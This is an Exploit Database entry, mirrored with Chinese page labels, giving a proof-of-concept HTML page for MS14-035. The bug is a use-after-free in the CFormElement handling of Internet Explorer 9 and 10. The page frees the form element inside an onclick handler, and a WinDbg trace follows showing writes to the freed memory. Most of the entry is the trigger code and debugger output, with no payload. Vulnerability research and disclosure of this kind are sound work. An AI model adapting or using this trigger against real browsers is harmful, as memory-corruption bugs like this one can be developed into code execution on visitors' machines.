Microsoft Internet Explorer 9/10 – CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

• Exploit Database
• 125 阅读

• 作者： Drozdova Liudmila
  日期： 2014-07-08
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/34010/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114

  <!-- Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace) Product: Internet Explorer Vulnerable version: 9,10 Date: 8.07.2014 Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/) Vendor Homepage: http://www.microsoft.com/ Tested on: Window 7 SP1 x86 IE 9,10 CVE : unknown --> <html>   <body>     <form id="form1"> <input id="input1" type="text" value=""> </form>     <script>   loaded = false ;   function func() {   if (loaded) { document.body.innerHTML = "" ; // free CFormElement }   }     input1 = document.getElementById("input1") ; input1.onclick = func ; loaded = true ; input1.click(); // Call DoClick function     </script> </body>   </html> <!-- Vulnerability details   MSHTML!CInput::DoClick   66943670 8bcfmov ecx,edi 66943672 ff751cpushdword ptr [ebp+1Ch] 66943675 ff7518pushdword ptr [ebp+18h] 66943678 ff7514pushdword ptr [ebp+14h] 6694367b ff7510pushdword ptr [ebp+10h] 6694367e ff750cpushdword ptr [ebp+0Ch] 66943681 ff7508pushdword ptr [ebp+8]<---- esi = CFormElement 66943684 e856e4f3ffcallMSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi 66943689 85dbtestebx,ebx 6694368b 7408jeMSHTML!CInput::DoClick+0x74 (66943695) 6694368d 83666400and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory 66943691 836668feand dword ptr [esi+68h],0FFFFFFFEh; memory corruption, write to freed memory   MSHTML!CInput::DoClick+0x60: 66943681 ff7508pushdword ptr [ebp+8]ss:0023:023ec994=00000000 0:005> p eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540 eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 MSHTML!CInput::DoClick+0x63: 66943684 e856e4f3ffcallMSHTML!CElement::DoClick (66881adf) 0:005> dds esi l1 0034cd206661ead8 MSHTML!CFormElement::<code>vftable&apos;       0:005> !heap -x esi <-- esi contains valid pointer to CFormElement Entry UserHeapSegment SizePrevSizeUnusedFlags ----------------------------------------------------------------------------- 0034cd180034cd2000270000002fcee878-cLFH;busy   0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000246 MSHTML!CInput::DoClick+0x68: 66943689 85dbtestebx,ebx 0:005> dds esi l1 0034cd206661005c MSHTML!CSVGPathSegCurvetoCubicAbs::</code>vftable&apos;+0x12c         0:005> !heap -x esi <-- esi contains freed pointer to CFormElement Entry UserHeapSegment SizePrevSizeUnusedFlags ----------------------------------------------------------------------------- 0034cd180034cd2000270000002fcee878-0LFH;free   0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 MSHTML!CInput::DoClick+0x6a: 6694368b 7408jeMSHTML!CInput::DoClick+0x74 (66943695)[br=0] 0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 MSHTML!CInput::DoClick+0x6c: 6694368d 83666400and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001     -->